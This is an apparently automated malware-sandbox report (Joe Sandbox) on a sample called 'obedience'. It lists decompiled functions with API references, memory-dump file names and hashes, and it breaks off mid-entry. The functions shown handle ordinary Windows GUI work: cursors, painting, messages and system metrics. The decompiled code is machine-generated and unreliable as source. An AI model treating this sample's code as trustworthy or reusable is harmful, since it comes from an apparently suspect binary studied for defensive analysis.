      0x004625cc
      0x00462628
      0x00462633
      0x00000000
      0x004625ce
      0x004625cf
      0x004625d4
      0x004625e1
      0x004625e5
      0x00000000
      0x004625e7
      0x004625ea
      0x004625f8
      0x00000000
      0x004625fa
      0x00462621
      0x00462621
      0x004625f8
      0x004625e5
      0x004625cc
      0x00462641

      APIs
      • GetCursorPos.USER32 ref: 004625CF
      • WindowFromPoint.USER32(?,?), ref: 004625DC
      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004625EA
      • GetCurrentThreadId.KERNEL32 ref: 004625F1
      • SendMessageA.USER32 ref: 0046260A
      • SendMessageA.USER32 ref: 00462621
      • SetCursor.USER32(00000000), ref: 00462633
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
      • String ID:
      • API String ID: 1770779139-0
      • Opcode ID: a4ead231e3d2669afbcd7b906a23320af280f2f02c897461a8b6a490a5b5ccc5
      • Instruction ID: a46696d9f44d158db03efb16f552d160a917e20c6f04fbdd23bb764f2b308580
      • Opcode Fuzzy Hash: a4ead231e3d2669afbcd7b906a23320af280f2f02c897461a8b6a490a5b5ccc5
      • Instruction Fuzzy Hash: 7D01D832B4AB0039D62136754D86B7F2558CB817A5F50053FB504B61C3F97DAC01536F
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0040CB24 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E0040CB24(void* __edx, void* __edi, void* __fp0) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t12;
				char* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t24;
				long _t32;

				_t40 = __edx;
				E0040C98C(_t12,  &_v1024, __edx, __fp0, 0x400);
				_t14 =  *0x48f8c0; // 0x490048
				if( *_t14 == 0) {
					_t16 =  *0x48f618; // 0x407dbc
					_t9 = _t16 + 4; // 0xffeb
					_t18 =  *0x490664; // 0x400000
					LoadStringA(E00405EC0(_t18,  &_v1024, _t40),  *_t9,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t24 =  *0x48f678; // 0x490218
				E00402C58(E004032DC(_t24));
				CharToOemA( &_v1024,  &_v1024);
				_t32 = E00409A44( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff4), 0x40cbe8, 2,  &_v1092, 0);
			}












      0x0040cb24
      0x0040cb33
      0x0040cb38
      0x0040cb40
      0x0040cba7
      0x0040cbac
      0x0040cbb0
      0x0040cbbb
      0x00000000
      0x0040cbd1
      0x0040cb42
      0x0040cb4c
      0x0040cb5b
      0x0040cb6b
      0x0040cb7e
      0x00000000

      APIs
        • Part of subcall function 0040C98C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040C9A8
        • Part of subcall function 0040C98C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040C9CC
        • Part of subcall function 0040C98C: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040C9E7
        • Part of subcall function 0040C98C: LoadStringA.USER32 ref: 0040CA8B
      • CharToOemA.USER32 ref: 0040CB5B
      • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040CB78
      • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040CB7E
      • GetStdHandle.KERNEL32(000000F4,0040CBE8,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040CB93
      • WriteFile.KERNEL32(00000000,000000F4,0040CBE8,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040CB99
      • LoadStringA.USER32 ref: 0040CBBB
      • MessageBoxA.USER32 ref: 0040CBD1
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
      • String ID:
      • API String ID: 185507032-0
      • Opcode ID: a8eb735539d66ca88a6210c5c44812f1f39e77f3cc58d2b897131e8db65d26c3
      • Instruction ID: 7731975ad474b23c23bc64afc69e40a4413cdd0c5d23dd247e2cef9b0bc7fe10
      • Opcode Fuzzy Hash: a8eb735539d66ca88a6210c5c44812f1f39e77f3cc58d2b897131e8db65d26c3
      • Instruction Fuzzy Hash: 9C1142B2548200BAD200F7A5DC86F9B77EC5B44704F504A3FB244F60E1DA78F944876A
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00437AD0 Relevance: 9.3, APIs: 6, Instructions: 286windowCOMMON
      Download Yara Rule
      C-Code - Quality: 87%
      			E00437AD0(intOrPtr __eax, void* __ebx, signed int* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				void* _v44;
				struct tagMSG _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				char _v88;
				char _v92;
				long _t115;
				void* _t119;
				intOrPtr _t122;
				void* _t130;
				void* _t133;
				void* _t139;
				signed int _t148;
				void* _t152;
				long _t167;
				void* _t177;
				intOrPtr _t178;
				signed int _t180;
				intOrPtr _t184;
				signed int _t186;
				signed int _t195;
				int _t199;
				signed int _t205;
				signed int _t220;
				signed int* _t232;
				void* _t233;
				intOrPtr _t251;
				intOrPtr _t256;
				void* _t284;
				signed int _t293;
				intOrPtr _t295;
				intOrPtr _t296;

				_t291 = __esi;
				_t288 = __edi;
				_t295 = _t296;
				_t233 = 0xb;
				do {
					_push(0);
					_push(0);
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t232 = __edx;
				_v8 = __eax;
				_push(_t295);
				_push(0x437e88);
				_push( *[fs:eax]);
				 *[fs:eax] = _t296;
				E0044A13C(_v8, __edx);
				if( *((char*)(_v8 + 0x268)) == 0) {
					L40:
					_pop(_t251);
					 *[fs:eax] = _t251;
					_push(0x437e8f);
					E00404A64( &_v92, 5);
					E00404A40( &_v72);
					E00404A64( &_v68, 2);
					E00404A64( &_v60, 2);
					return E00404A64( &_v24, 2);
				} else {
					if( *((intOrPtr*)(_v8 + 0x276)) - 2 >= 0) {
						_t115 = GetTickCount();
						_t256 = _v8;
						__eflags = _t115 -  *((intOrPtr*)(_t256 + 0x26c)) - 0x1f4;
						if(_t115 -  *((intOrPtr*)(_t256 + 0x26c)) >= 0x1f4) {
							__eflags = _v8 + 0x270;
							E00404A40(_v8 + 0x270);
						}
						 *((intOrPtr*)(_v8 + 0x26c)) = GetTickCount();
					} else {
						E00444928(_v8,  &_v56);
						E00404A94(_v8 + 0x270, _v56);
					}
					_t119 =  *_t232 - 8;
					if(_t119 == 0) {
						__eflags = E004379DC( &_v12,  &_v16, _t295);
						if(__eflags == 0) {
							_t122 = _v8;
							__eflags =  *((intOrPtr*)(_t122 + 0x276)) - 2;
							if( *((intOrPtr*)(_t122 + 0x276)) - 2 >= 0) {
								while(1) {
									L24:
									_t130 = E0040D5B0( *(_v8 + 0x270), E00404D00( *(_v8 + 0x270)));
									__eflags = _t130 - 2;
									if(_t130 != 2) {
										break;
									}
									_t133 = E00404D00( *(_v8 + 0x270));
									__eflags = _v8 + 0x270;
									E00404FA0(_v8 + 0x270, 1, _t133);
								}
								_t139 = E00404D00( *(_v8 + 0x270));
								__eflags = _v8 + 0x270;
								E00404FA0(_v8 + 0x270, 1, _t139);
								L26:
								 *_t232 = 0;
								E00403DF8(_v8, __eflags);
								goto L40;
							}
							E00444928(_v8,  &_v60);
							_t148 = E00404D00(_v60);
							__eflags = _t148;
							if(_t148 <= 0) {
								goto L24;
							}
							E00444928(_v8,  &_v24);
							_t293 = _v12;
							while(1) {
								_t152 = E0040D5B0(_v24, _t293);
								__eflags = _t152 - 2;
								if(_t152 != 2) {
									break;
								}
								_t293 = _t293 - 1;
								__eflags = _t293;
							}
							E00404F60(_v24, _t293 - 1, 1,  &_v20);
							SendMessageA(E0044B158(_v8), 0x14e, 0xffffffff, 0);
							E00404F60(_v24, 0x7fffffff, _v16 + 1,  &_v68);
							E00404D4C( &_v64, _v68, _v20);
							E00444958(_v8, _t232, _v64, _t293);
							_t167 = E00407ABC();
							SendMessageA(E0044B158(_v8), 0x142, 0, _t167);
							E00444928(_v8,  &_v72);
							E00404A94(_v8 + 0x270, _v72);
							goto L26;
						}
						E00437A08(_t232, _t291, __eflags, _t295);
						goto L26;
					} else {
						_t177 = _t119 - 1;
						if(_t177 == 0) {
							_t178 = _v8;
							__eflags =  *((char*)(_t178 + 0x269));
							if( *((char*)(_t178 + 0x269)) != 0) {
								_t180 = E00436A04(_v8);
								__eflags = _t180;
								if(_t180 != 0) {
									E00436A28(_v8, 0);
								}
							}
						} else {
							if(_t177 != 0x12) {
								_t184 = _v8;
								__eflags =  *((char*)(_t184 + 0x269));
								if( *((char*)(_t184 + 0x269)) != 0) {
									_t220 = E00436A04(_v8);
									__eflags = _t220;
									if(_t220 == 0) {
										E00436A28(_v8, 1);
									}
								}
								_t186 = E004379DC( &_v12,  &_v16, _t295);
								__eflags = _t186;
								if(_t186 == 0) {
									E00404C28();
									E00404D4C( &_v24, _v84,  *(_v8 + 0x270));
								} else {
									E00404F60( *(_v8 + 0x270), _v12, 1,  &_v76);
									_push(_v76);
									E00404C28();
									_pop(_t284);
									E00404D4C( &_v24, _v80, _t284);
								}
								__eflags =  *_t232 & 0x000000ff;
								asm("bt [edx], eax");
								if(( *_t232 & 0x000000ff) >= 0) {
									_t195 = E00437E98(_v8, _t232, _v24, _t288, _t291);
									__eflags = _t195;
									if(_t195 != 0) {
										 *_t232 = 0;
									}
								} else {
									_t199 = PeekMessageA( &_v52, E0044B158(_v8), 0, 0, 0);
									__eflags = _t199;
									if(_t199 != 0) {
										__eflags = _v52.message - 0x102;
										if(_v52.message == 0x102) {
											E00404C28();
											E00404D4C( &_v88, _v92, _v24);
											_t205 = E00437E98(_v8, _t232, _v88, _t288, _t291);
											__eflags = _t205;
											if(_t205 != 0) {
												PeekMessageA( &_v52, E0044B158(_v8), 0, 0, 1);
												 *_t232 = 0;
											}
										}
									}
								}
							}
						}
						goto L40;
					}
				}
			}














































      0x00437ad0
      0x00437ad0
      0x00437ad1
      0x00437ad3
      0x00437ad8
      0x00437ad8
      0x00437ada
      0x00437adc
      0x00437adc
      0x00437adf
      0x00437ae0
      0x00437ae1
      0x00437ae2
      0x00437ae4
      0x00437ae9
      0x00437aea
      0x00437aef
      0x00437af2
      0x00437afa
      0x00437b09
      0x00437e3e
      0x00437e40
      0x00437e43
      0x00437e46
      0x00437e53
      0x00437e5b
      0x00437e68
      0x00437e75
      0x00437e87
      0x00437b0f
      0x00437b1a
      0x00437b39
      0x00437b3e
      0x00437b47
      0x00437b4c
      0x00437b51
      0x00437b56
      0x00437b56
      0x00437b63
      0x00437b1c
      0x00437b22
      0x00437b32
      0x00437b32
      0x00437b6b
      0x00437b6d
      0x00437bbc
      0x00437bbe
      0x00437bcc
      0x00437bd5
      0x00437bd7
      0x00437cd1
      0x00437cd1
      0x00437cea
      0x00437cef
      0x00437cf1
      0x00000000
      0x00000000
      0x00437cb8
      0x00437cc2
      0x00437ccc
      0x00437ccc
      0x00437cfc
      0x00437d06
      0x00437d10
      0x00437d15
      0x00437d15
      0x00437d1f
      0x00000000
      0x00437d1f
      0x00437be3
      0x00437beb
      0x00437bf0
      0x00437bf2
      0x00000000
      0x00000000
      0x00437bfe
      0x00437c03
      0x00437c09
      0x00437c0e
      0x00437c13
      0x00437c15
      0x00000000
      0x00000000
      0x00437c08
      0x00437c08
      0x00437c08
      0x00437c26
      0x00437c3d
      0x00437c52
      0x00437c60
      0x00437c6b
      0x00437c77
      0x00437c8d
      0x00437c98
      0x00437ca8
      0x00000000
      0x00437ca8
      0x00437bc1
      0x00000000
      0x00437b6f
      0x00437b6f
      0x00437b71
      0x00437b80
      0x00437b83
      0x00437b8a
      0x00437b93
      0x00437b98
      0x00437b9a
      0x00437ba5
      0x00437ba5
      0x00437b9a
      0x00437b73
      0x00437b75
      0x00437d29
      0x00437d2c
      0x00437d33
      0x00437d38
      0x00437d3d
      0x00437d3f
      0x00437d46
      0x00437d46
      0x00437d3f
      0x00437d52
      0x00437d58
      0x00437d5a
      0x00437d97
      0x00437dab
      0x00437d5c
      0x00437d71
      0x00437d79
      0x00437d7f
      0x00437d8a
      0x00437d8b
      0x00437d8b
      0x00437db8
      0x00437dbd
      0x00437dc0
      0x00437e32
      0x00437e37
      0x00437e39
      0x00437e3b
      0x00437e3b
      0x00437dc2
      0x00437dd5
      0x00437dda
      0x00437ddc
      0x00437dde
      0x00437de5
      0x00437ded
      0x00437dfb
      0x00437e06
      0x00437e0b
      0x00437e0d
      0x00437e22
      0x00437e27
      0x00437e27
      0x00437e0d
      0x00437de5
      0x00437ddc
      0x00437dc0
      0x00437b75
      0x00000000
      0x00437b71
      0x00437b6d

      APIs
      • GetTickCount.KERNEL32 ref: 00437B39
      • GetTickCount.KERNEL32 ref: 00437B5B
        • Part of subcall function 004379DC: SendMessageA.USER32 ref: 004379F8
      • SendMessageA.USER32 ref: 00437C3D
      • SendMessageA.USER32 ref: 00437C8D
        • Part of subcall function 00437A08: SendMessageA.USER32 ref: 00437A49
        • Part of subcall function 00437A08: SendMessageA.USER32 ref: 00437A75
        • Part of subcall function 00437A08: SendMessageA.USER32 ref: 00437AA9
      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00437DD5
      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00437E22
        • Part of subcall function 00436A04: SendMessageA.USER32 ref: 00436A18
        • Part of subcall function 00436A28: SendMessageA.USER32 ref: 00436A45
        • Part of subcall function 00436A28: InvalidateRect.USER32(00000000,000000FF,000000FF), ref: 00436A62
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Message$Send$CountPeekTick$InvalidateRect
      • String ID:
      • API String ID: 2065907832-0
      • Opcode ID: e16dcc9782ee38b830b6a9d5659059337ec8e212a6b64cf1a4c0ab16ddffc2e9
      • Instruction ID: 2726e0fa0c6476143346c5794e3006218aad42d862a8c31501772db6f17a8fe3
      • Opcode Fuzzy Hash: e16dcc9782ee38b830b6a9d5659059337ec8e212a6b64cf1a4c0ab16ddffc2e9
      • Instruction Fuzzy Hash: 11B18670A04109DFDB10EBA5C986BDEB3B5AF49304F2450B6F444BB396C738AE06DB59
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0045E044 Relevance: 9.2, APIs: 6, Instructions: 150COMMON
      Download Yara Rule
      C-Code - Quality: 89%
      			E0045E044(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				struct HDC__* _v16;
				struct tagPAINTSTRUCT _v80;
				struct tagRECT _v96;
				struct tagRECT _v112;
				signed int _v116;
				long _v120;
				void* __ebp;
				void* _t68;
				void* _t94;
				struct HBRUSH__* _t97;
				intOrPtr _t105;
				void* _t118;
				void* _t127;
				intOrPtr _t140;
				intOrPtr _t146;
				void* _t147;
				void* _t148;
				void* _t150;
				void* _t152;
				intOrPtr _t153;

				_t148 = __esi;
				_t147 = __edi;
				_t138 = __edx;
				_t127 = __ebx;
				_t150 = _t152;
				_t153 = _t152 + 0xffffff8c;
				_v12 = __edx;
				_v8 = __eax;
				_t68 =  *_v12 - 0xf;
				if(_t68 == 0) {
					_v16 =  *(_v12 + 4);
					if(_v16 == 0) {
						 *(_v12 + 4) = BeginPaint( *(_v8 + 0x254),  &_v80);
					}
					_push(_t150);
					_push(0x45e212);
					_push( *[fs:eax]);
					 *[fs:eax] = _t153;
					if(_v16 == 0) {
						GetWindowRect( *(_v8 + 0x254),  &_v96);
						E0044446C(_v8,  &_v120,  &_v96);
						_v96.left = _v120;
						_v96.top = _v116;
						E00443264( *(_v12 + 4),  ~(_v96.top),  ~(_v96.left));
					}
					E00448DE4(_v8, _t127, _v12, _t147, _t148);
					_pop(_t140);
					 *[fs:eax] = _t140;
					_push(0x45e220);
					if(_v16 == 0) {
						return EndPaint( *(_v8 + 0x254),  &_v80);
					}
					return 0;
				} else {
					_t94 = _t68 - 5;
					if(_t94 == 0) {
						_t97 = E0042632C( *((intOrPtr*)(_v8 + 0x170)));
						 *((intOrPtr*)( *_v8 + 0x44))();
						FillRect( *(_v12 + 4),  &_v112, _t97);
						if( *((char*)(_v8 + 0x22f)) == 2 &&  *(_v8 + 0x254) != 0) {
							GetClientRect( *(_v8 + 0x254),  &_v96);
							FillRect( *(_v12 + 4),  &_v96, E0042632C( *((intOrPtr*)(_v8 + 0x170))));
						}
						_t105 = _v12;
						 *((intOrPtr*)(_t105 + 0xc)) = 1;
					} else {
						_t118 = _t94 - 0x2b;
						if(_t118 == 0) {
							E0045DFB8(_t150);
							_t105 = _v8;
							if( *((char*)(_t105 + 0x22f)) == 2) {
								if(E0045E4E0(_v8) == 0 || E0045E004(_t138, _t150) == 0) {
									_t146 = 1;
								} else {
									_t146 = 0;
								}
								_t105 = E0045B2B8( *(_v8 + 0x254), _t146);
							}
						} else {
							if(_t118 != 0x45) {
								_t105 = E0045DFB8(_t150);
							} else {
								E0045DFB8(_t150);
								_t105 = _v12;
								if( *((intOrPtr*)(_t105 + 0xc)) == 1) {
									_t105 = _v12;
									 *((intOrPtr*)(_t105 + 0xc)) = 0xffffffff;
								}
							}
						}
					}
					return _t105;
				}
			}

























      0x0045e044
      0x0045e044
      0x0045e044
      0x0045e044
      0x0045e045
      0x0045e047
      0x0045e04a
      0x0045e04d
      0x0045e055
      0x0045e058
      0x0045e168
      0x0045e16f
      0x0045e187
      0x0045e187
      0x0045e18c
      0x0045e18d
      0x0045e192
      0x0045e195
      0x0045e19c
      0x0045e1ac
      0x0045e1ba
      0x0045e1c2
      0x0045e1c8
      0x0045e1db
      0x0045e1db
      0x0045e1e6
      0x0045e1ed
      0x0045e1f0
      0x0045e1f3
      0x0045e1fc
      0x00000000
      0x0045e20c
      0x0045e211
      0x0045e05e
      0x0045e05e
      0x0045e061
      0x0045e0a1
      0x0045e0af
      0x0045e0bd
      0x0045e0cc
      0x0045e0e8
      0x0045e107
      0x0045e107
      0x0045e10c
      0x0045e10f
      0x0045e063
      0x0045e063
      0x0045e066
      0x0045e11c
      0x0045e122
      0x0045e12c
      0x0045e13c
      0x0045e14d
      0x0045e149
      0x0045e149
      0x0045e149
      0x0045e158
      0x0045e158
      0x0045e06c
      0x0045e06f
      0x0045e21a
      0x0045e075
      0x0045e076
      0x0045e07c
      0x0045e083
      0x0045e089
      0x0045e08c
      0x0045e08c
      0x0045e083
      0x0045e06f
      0x0045e066
      0x0045e223
      0x0045e223

      APIs
      • FillRect.USER32 ref: 0045E0BD
      • GetClientRect.USER32(00000000,?), ref: 0045E0E8
      • FillRect.USER32 ref: 0045E107
        • Part of subcall function 0045DFB8: CallWindowProcA.USER32 ref: 0045DFF2
      • BeginPaint.USER32(?,?), ref: 0045E17F
      • GetWindowRect.USER32 ref: 0045E1AC
      • EndPaint.USER32(?,?,0045E220), ref: 0045E20C
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Rect$FillPaintWindow$BeginCallClientProc
      • String ID:
      • API String ID: 901200654-0
      • Opcode ID: 257ffd95361531f35d55efac916bb8ae1f7098fa6ab1771df41d818bd5355525
      • Instruction ID: acc5bc2361441916d8b75bc5a61d49b13a3cbd7431ce75e5604705cb6672fe87
      • Opcode Fuzzy Hash: 257ffd95361531f35d55efac916bb8ae1f7098fa6ab1771df41d818bd5355525
      • Instruction Fuzzy Hash: 33510A31904508EFCB04DFAAD589E9DB7F9AF08315F5485A6F804AB356C738AE49CB08
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0042794C Relevance: 9.1, APIs: 6, Instructions: 84COMMON
      Download Yara Rule
      C-Code - Quality: 68%
      			E0042794C(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, int _a4, signed int* _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v32;
				signed short _v44;
				int _t36;
				signed int _t37;
				signed short _t38;
				signed int _t39;
				signed short _t43;
				signed int* _t47;
				signed int _t51;
				intOrPtr _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				intOrPtr _t70;

				_t68 = _t69;
				_t70 = _t69 + 0xffffff8c;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t47 = _a8;
				_v24 = _v16 << 4;
				_v20 = E00408C10(_v24, __ecx, __edx, __eflags);
				 *[fs:edx] = _t70;
				_t51 = _v24;
				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:edx], 0x427c4e, _t68, __edi, __esi, __ebx, _t67);
				if(( *_t47 | _t47[1]) != 0) {
					_t36 = _a4;
					 *_t36 =  *_t47;
					 *(_t36 + 4) = _t47[1];
				} else {
					 *_a4 = GetSystemMetrics(0xb);
					_t36 = GetSystemMetrics(0xc);
					 *(_a4 + 4) = _t36;
				}
				_push(0);
				L00407658();
				_v44 = _t36;
				if(_v44 == 0) {
					E00426DFC(_t51);
				}
				_push(_t68);
				_push(0x427a35);
				_push( *[fs:edx]);
				 *[fs:edx] = _t70;
				_push(0xe);
				_t37 = _v44;
				_push(_t37);
				L00407348();
				_push(0xc);
				_t38 = _v44;
				_push(_t38);
				L00407348();
				_t39 = _t37 * _t38;
				if(_t39 <= 8) {
					__eflags = 1;
					_v32 = 1 << _t39;
				} else {
					_v32 = 0x7fffffff;
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(0x427a3c);
				_t43 = _v44;
				_push(_t43);
				_push(0);
				L004078C0();
				return _t43;
			}






















      0x0042794d
      0x0042794f
      0x00427955
      0x00427958
      0x0042795b
      0x0042795e
      0x00427967
      0x00427972
      0x00427980
      0x00427986
      0x0042798e
      0x00427996
      0x004279b3
      0x004279b8
      0x004279bd
      0x00427998
      0x004279a2
      0x004279a6
      0x004279ae
      0x004279ae
      0x004279c0
      0x004279c2
      0x004279c7
      0x004279ce
      0x004279d0
      0x004279d0
      0x004279d7
      0x004279d8
      0x004279dd
      0x004279e0
      0x004279e3
      0x004279e5
      0x004279e8
      0x004279e9
      0x004279f0
      0x004279f2
      0x004279f5
      0x004279f6
      0x004279ff
      0x00427a05
      0x00427a17
      0x00427a19
      0x00427a07
      0x00427a07
      0x00427a07
      0x00427a1e
      0x00427a21
      0x00427a24
      0x00427a29
      0x00427a2c
      0x00427a2d
      0x00427a2f
      0x00427a34

      APIs
      • GetSystemMetrics.USER32 ref: 0042799A
      • GetSystemMetrics.USER32 ref: 004279A6
      • 73BEAC50.USER32(00000000), ref: 004279C2
      • 73BEAD70.GDI32(00000000,0000000E,00000000,00427A35,?,00000000), ref: 004279E9
      • 73BEAD70.GDI32(00000000,0000000C,00000000,0000000E,00000000,00427A35,?,00000000), ref: 004279F6
      • 73BEB380.USER32(00000000,00000000,00427A3C,0000000E,00000000,00427A35,?,00000000), ref: 00427A2F
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: MetricsSystem$B380
      • String ID:
      • API String ID: 3145338429-0
      • Opcode ID: 7a204e224ad6318cfd167f0949e7acb05993660fdf191624f6b93a5738e0c1c8
      • Instruction ID: b3ffd304a784558478ca0aaff8c0251e89a7260a022c18bacdd69187ac3f3fb4
      • Opcode Fuzzy Hash: 7a204e224ad6318cfd167f0949e7acb05993660fdf191624f6b93a5738e0c1c8
